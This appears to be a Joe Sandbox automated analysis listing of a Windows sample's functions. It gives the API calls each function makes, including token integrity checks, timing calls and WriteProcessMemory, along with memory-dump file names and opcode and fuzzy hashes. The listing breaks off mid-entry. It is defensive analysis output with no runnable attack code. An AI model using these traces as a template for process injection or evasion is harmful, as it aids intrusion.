                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00DDE997
                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 00DDE9A5
                                              • Sleep.KERNEL32(00000000), ref: 00DDE9AD
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00DDE9B7
                                              • Sleep.KERNEL32 ref: 00DDE9F3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: f0368be5a0c004b647255198b6fed3fdfdd01f1df158cc8b67aecace76053261
                                              • Instruction ID: e818860c27568ca3e77933f41a5894dac21197659c684f5365695352382773c8
                                              • Opcode Fuzzy Hash: f0368be5a0c004b647255198b6fed3fdfdd01f1df158cc8b67aecace76053261
                                              • Instruction Fuzzy Hash: 1E011731C02629DBCF00ABE6DC69AEDFB78FB09701F100656E542B6251CB3196998BA1
                                              Function 00DD10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1114
                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1120
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD112F
                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00DD1136
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD114D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 883493501-0
                                              • Opcode ID: 06dd1ba27d71278d4e0eb0208cca3669be1ed8364a670a0b4e875fd1dbecc544
                                              • Instruction ID: bd7e8736d01f0289490ff559aebd2637ac336495900fa1fbfb32da7eb025cf9f
                                              • Opcode Fuzzy Hash: 06dd1ba27d71278d4e0eb0208cca3669be1ed8364a670a0b4e875fd1dbecc544
                                              • Instruction Fuzzy Hash: 67011D79101305BFDB114FA5DC49A6A3B7EEF89360B244515FA45D7350DA32DC849A60
                                              Function 00DD0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DD0FCA
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DD0FD6
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DD0FE5
                                              • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00DD0FEC
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DD1002
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 47921759-0
                                              • Opcode ID: 3e4f75c55c167d1683df3fba7780db6f05a3e80f6c70afe93d5e0e17425c2022
                                              • Instruction ID: e922cde4de68dbc8bf8a24e81ded39a0bb27a035172c4105631f3d9d8a066467
                                              • Opcode Fuzzy Hash: 3e4f75c55c167d1683df3fba7780db6f05a3e80f6c70afe93d5e0e17425c2022
                                              • Instruction Fuzzy Hash: C5F0AF39140302BFD7211FA59C49F563B6DEF89761F200515F905D6250CA31DC808A60
                                              Function 00DD1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD102A
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1036
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1045
                                              • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00DD104C
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1062
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 47921759-0
                                              • Opcode ID: 9c2c968f44edc3867b8fc8bfb93bf017d8c4c1050c31bad15f401bfec9802f0c
                                              • Instruction ID: ebe7f89718480dc4c49d08be37b22f95b1e4bc252893911bfff108822e2549cf
                                              • Opcode Fuzzy Hash: 9c2c968f44edc3867b8fc8bfb93bf017d8c4c1050c31bad15f401bfec9802f0c
                                              • Instruction Fuzzy Hash: 94F04939201301BFDB216FA6EC49F663BADEF89761F240515FA45E6250CA72D8848A60
                                              Function 00DE030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0324
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0331
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE033E
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE034B
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0358
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0365
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 90b9cb27bc75663db864975de0ece11965fa95581c1cf660c974719580dfbe12
                                              • Instruction ID: 3cc1f321891342710747b17d3bfe05fd79b9261b2d514b41ea805aa19a9661f0
                                              • Opcode Fuzzy Hash: 90b9cb27bc75663db864975de0ece11965fa95581c1cf660c974719580dfbe12
                                              • Instruction Fuzzy Hash: 1401AE72800B559FCB30AF66D880812FBF9BF603153198A3FD19652931C3B1A998CF90
                                              Function 00DAD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00DAD752
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DAD764
                                              • _free.LIBCMT ref: 00DAD776
                                              • _free.LIBCMT ref: 00DAD788
                                              • _free.LIBCMT ref: 00DAD79A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: ea22048de59b337d403776d97211f6caeb9be652736a7e4f677a0e4876c39ff5
                                              • Instruction ID: 0a04668304671d31a5373e0a2641b1fa61487ff161d88acd0f585fe8193b45cf
                                              • Opcode Fuzzy Hash: ea22048de59b337d403776d97211f6caeb9be652736a7e4f677a0e4876c39ff5
                                              • Instruction Fuzzy Hash: ADF0EC32544208AF8669EB6AF9C5C2A7BDEFB46710BA90C05F04AF7911C730FC808A75
                                              Function 00DA22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00DA22BE
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DA22D0
                                              • _free.LIBCMT ref: 00DA22E3
                                              • _free.LIBCMT ref: 00DA22F4
                                              • _free.LIBCMT ref: 00DA2305
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 9fb320d47fbf53f996a6a73141b71ad34c3371672e39899faa0d06c96b8a0d2b
                                              • Instruction ID: 17739bd22a9559f1c85b443500a9095299685246d0716c3ac9106150f59df967
                                              • Opcode Fuzzy Hash: 9fb320d47fbf53f996a6a73141b71ad34c3371672e39899faa0d06c96b8a0d2b
                                              • Instruction Fuzzy Hash: 94F054785402108F8B56AF6BBC018293F64F71BB517160566F510F2371C730555ABFF9
                                              Function 00D895C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              • EndPath.GDI32(?), ref: 00D895D4
                                              • StrokeAndFillPath.GDI32(?,?,00DC71F7,00000000,?,?,?), ref: 00D895F0
                                              • SelectObject.GDI32(?,00000000), ref: 00D89603
                                              • DeleteObject.GDI32 ref: 00D89616
                                              • StrokePath.GDI32(?), ref: 00D89631
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 67adaed6a51b1e9b7b4847c8b4e147898972c9df78e54c0516d530d72e492fc9
                                              • Instruction ID: d6d7ef7ccca58f52746e71e2a556c9aad06b0f5f972858d2f212352393bdfca7
                                              • Opcode Fuzzy Hash: 67adaed6a51b1e9b7b4847c8b4e147898972c9df78e54c0516d530d72e492fc9
                                              • Instruction Fuzzy Hash: E3F01938006204EFDB126F66ED287643B65EB82362F188354F6A9750F0D73189DADF20
                                              Function 00DD1874 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DD187F
                                              • CloseHandle.KERNEL32(?), ref: 00DD1894
                                              • CloseHandle.KERNEL32(?), ref: 00DD189C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD18A5
                                              • HeapFree.KERNEL32(00000000), ref: 00DD18AC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                              • String ID:
                                              • API String ID: 3751786701-0
                                              • Opcode ID: 8f66747928f2ec7429fae3e8ada73c24e60bf29b58ed73f268c7d4035e0c75e4
                                              • Instruction ID: 6e4419053dac1f07529ccd9ae9481cef4e4b00a272f37b2849ed899ec3251be9
                                              • Opcode Fuzzy Hash: 8f66747928f2ec7429fae3e8ada73c24e60bf29b58ed73f268c7d4035e0c75e4
                                              • Instruction Fuzzy Hash: B4E0E536004102BFDB015FA2ED0C90ABF39FF49B22B208321F225A10B1CB3394A4DF90
                                              Function 00DA0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: __freea$_free
                                              • String ID: a/p$am/pm
                                              • API String ID: 3432400110-3206640213
                                              • Opcode ID: 989fbaa6c5e9f246f6df9bd1c9b6ee51c06716fea1c07ce309cbef61be6bc6a4
                                              • Instruction ID: a6edaffbf13c25c64c3194ec21f748fd181de4fb9ac13055e74ce12a3b068b1e
                                              • Opcode Fuzzy Hash: 989fbaa6c5e9f246f6df9bd1c9b6ee51c06716fea1c07ce309cbef61be6bc6a4
                                              • Instruction Fuzzy Hash: E6D1F039900206DADF289F68C856BFABBB5EF07310F2C4259E941AB650D375DD80CBB5
                                              Function 00DE910C Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 383COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • _wcslen.LIBCMT ref: 00DE9506
                                              • _wcslen.LIBCMT ref: 00DE952D
                                              • 7523D1A0.COMDLG32(00000058), ref: 00DE9585
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$7523
                                              • String ID: X
                                              • API String ID: 1414850397-3081909835
                                              • Opcode ID: a4ea78f436a825126a3f4c5d832898b9d419fd81f740f766c69a0ed11cf4bceb
                                              • Instruction ID: 8d85d8c90a22b4530620be0eef0afdc8e5278cb44fe08f46e1825210b9342daa
                                              • Opcode Fuzzy Hash: a4ea78f436a825126a3f4c5d832898b9d419fd81f740f766c69a0ed11cf4bceb
                                              • Instruction Fuzzy Hash: 9FE19F715043409FD724EF25C891A6AB7E0FF85314F18896DF8899B2A2EB31DD45CBB2
                                              Function 00DF61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D90242: RtlEnterCriticalSection.NTDLL(00E4070C), ref: 00D9024D
                                                • Part of subcall function 00D90242: RtlLeaveCriticalSection.NTDLL(00E4070C), ref: 00D9028A
                                                • Part of subcall function 00D900A3: __onexit.LIBCMT ref: 00D900A9
                                              • __Init_thread_footer.LIBCMT ref: 00DF6238
                                                • Part of subcall function 00D901F8: RtlEnterCriticalSection.NTDLL(00E4070C), ref: 00D90202
                                                • Part of subcall function 00D901F8: RtlLeaveCriticalSection.NTDLL(00E4070C), ref: 00D90235
                                                • Part of subcall function 00DE359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DE35E4
                                                • Part of subcall function 00DE359C: LoadStringW.USER32(00E42390,?,00000FFF,?), ref: 00DE360A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                              • String ID: x#$x#$x#
                                              • API String ID: 1072379062-1894725482
                                              • Opcode ID: 78d5b76891a669c82d8965600fe6ac7a19423bfbbd837228465f47f321cf985f
                                              • Instruction ID: 1b3d1267dab4b009b227fe4d08b34e1edf8634d5e726aaaa321e33020c911088
                                              • Opcode Fuzzy Hash: 78d5b76891a669c82d8965600fe6ac7a19423bfbbd837228465f47f321cf985f
                                              • Instruction Fuzzy Hash: A0C15E71A00109AFCB14EF58D891DBEB7B9EF49300F158069FA55AB291DB70ED45CBB0
                                              Function 00DF7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D90242: RtlEnterCriticalSection.NTDLL(00E4070C), ref: 00D9024D
                                                • Part of subcall function 00D90242: RtlLeaveCriticalSection.NTDLL(00E4070C), ref: 00D9028A
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00D900A3: __onexit.LIBCMT ref: 00D900A9
                                              • __Init_thread_footer.LIBCMT ref: 00DF7BFB
                                                • Part of subcall function 00D901F8: RtlEnterCriticalSection.NTDLL(00E4070C), ref: 00D90202
                                                • Part of subcall function 00D901F8: RtlLeaveCriticalSection.NTDLL(00E4070C), ref: 00D90235
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                              • String ID: 5$G$Variable must be of type 'Object'.
                                              • API String ID: 535116098-3733170431
                                              • Opcode ID: 9b9689a8d4d9e7a6a56b2c0e24e12974a86ccd3b61ad6564d00e361b3001fae7
                                              • Instruction ID: 0dc6cd768527cc6b6cd2028d63a15cc84f826f80514aa15d7c898734e1a0d0b8
                                              • Opcode Fuzzy Hash: 9b9689a8d4d9e7a6a56b2c0e24e12974a86ccd3b61ad6564d00e361b3001fae7
                                              • Instruction Fuzzy Hash: 8D917974A04209EFCB04EF54D8919FDB7B1EF49300F558059FA46AB292EB71AE81CB71
                                              Function 00DD2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DDB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DD21D0,?,?,00000034,00000800,?,00000034), ref: 00DDB42D
